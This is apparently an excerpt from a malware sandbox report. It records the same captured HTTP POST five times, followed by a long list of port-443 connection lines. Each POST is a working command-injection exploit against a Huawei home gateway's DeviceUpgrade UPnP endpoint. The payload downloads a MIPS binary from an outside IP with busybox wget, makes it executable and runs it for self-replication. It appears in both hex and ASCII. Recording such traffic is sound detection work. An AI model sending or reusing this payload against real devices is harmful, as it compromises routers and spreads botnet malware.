Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46356
Source: unknown	Network traffic detected: HTTP traffic on port 41058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44404 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 41792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45142
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56158
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50970
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34248
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59428
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33288
Source: unknown	Network traffic detected: HTTP traffic on port 60838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34012
Source: unknown	Network traffic detected: HTTP traffic on port 47350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33598 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33288 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51708
Source: unknown	Network traffic detected: HTTP traffic on port 59608 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50746
Source: unknown	Network traffic detected: HTTP traffic on port 33380 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45370
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43192
Source: unknown	Network traffic detected: HTTP traffic on port 59690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33388
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58234
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36656
Source: unknown	Network traffic detected: HTTP traffic on port 40030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35692
Source: unknown	Network traffic detected: HTTP traffic on port 51708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 43950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44588 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51608
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44030
Source: unknown	Network traffic detected: HTTP traffic on port 60208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54460 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35318
Source: unknown	Network traffic detected: HTTP traffic on port 55694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50750
Source: unknown	Network traffic detected: HTTP traffic on port 38816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56158 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36888
Source: unknown	Network traffic detected: HTTP traffic on port 49658 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58364 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58364
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33380
Source: unknown	Network traffic detected: HTTP traffic on port 53856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59690
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50402
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44260
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45472
Source: unknown	Network traffic detected: HTTP traffic on port 53890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42658 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58006
Source: unknown	Network traffic detected: HTTP traffic on port 36978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34214
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35666
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38812
Source: unknown	Network traffic detected: HTTP traffic on port 35596 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34462
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38816
Source: unknown	Network traffic detected: HTTP traffic on port 45306 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46356 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60208
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60566
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50810
Source: unknown	Network traffic detected: HTTP traffic on port 50418 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51490 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56118
Source: unknown	Network traffic detected: HTTP traffic on port 36656 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37320
Source: unknown	Network traffic detected: HTTP traffic on port 59596 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38646
Source: unknown	Network traffic detected: HTTP traffic on port 50920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39618
Source: unknown	Network traffic detected: HTTP traffic on port 36290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60616
Source: unknown	Network traffic detected: HTTP traffic on port 48230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49658
Source: unknown	Network traffic detected: HTTP traffic on port 41598 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45178
Source: unknown	Network traffic detected: HTTP traffic on port 44348 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47350
Source: unknown	Network traffic detected: HTTP traffic on port 47958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36224
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38636
Source: unknown	Network traffic detected: HTTP traffic on port 56134 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56134
Source: unknown	Network traffic detected: HTTP traffic on port 46484 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36888 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57220
Source: unknown	Network traffic detected: HTTP traffic on port 40086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48310
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46374
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47460
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46490
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58318
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37660
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37540
Source: unknown	Network traffic detected: HTTP traffic on port 34878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35652 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36446
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35246
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57596
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56260
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56140
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38628
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57350
Source: unknown	Network traffic detected: HTTP traffic on port 50970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46484
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38982
Source: unknown	Network traffic detected: HTTP traffic on port 56344 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51930
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50720
Source: unknown	Network traffic detected: HTTP traffic on port 53170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56432 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36316
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35596
Source: unknown	Network traffic detected: HTTP traffic on port 47026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53340 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60880
Source: unknown	Network traffic detected: HTTP traffic on port 38000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37320 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34508 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52632 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46236
Source: unknown	Network traffic detected: HTTP traffic on port 48140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50420 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36316 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36150
Source: unknown	Network traffic detected: HTTP traffic on port 39932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52632
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38328
Source: unknown	Network traffic detected: HTTP traffic on port 59720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59274
Source: unknown	Network traffic detected: HTTP traffic on port 41898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48486
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37590
Source: unknown	Network traffic detected: HTTP traffic on port 45452 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51794
Source: unknown	Network traffic detected: HTTP traffic on port 40188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52400
Source: unknown	Network traffic detected: HTTP traffic on port 33388 -> 443
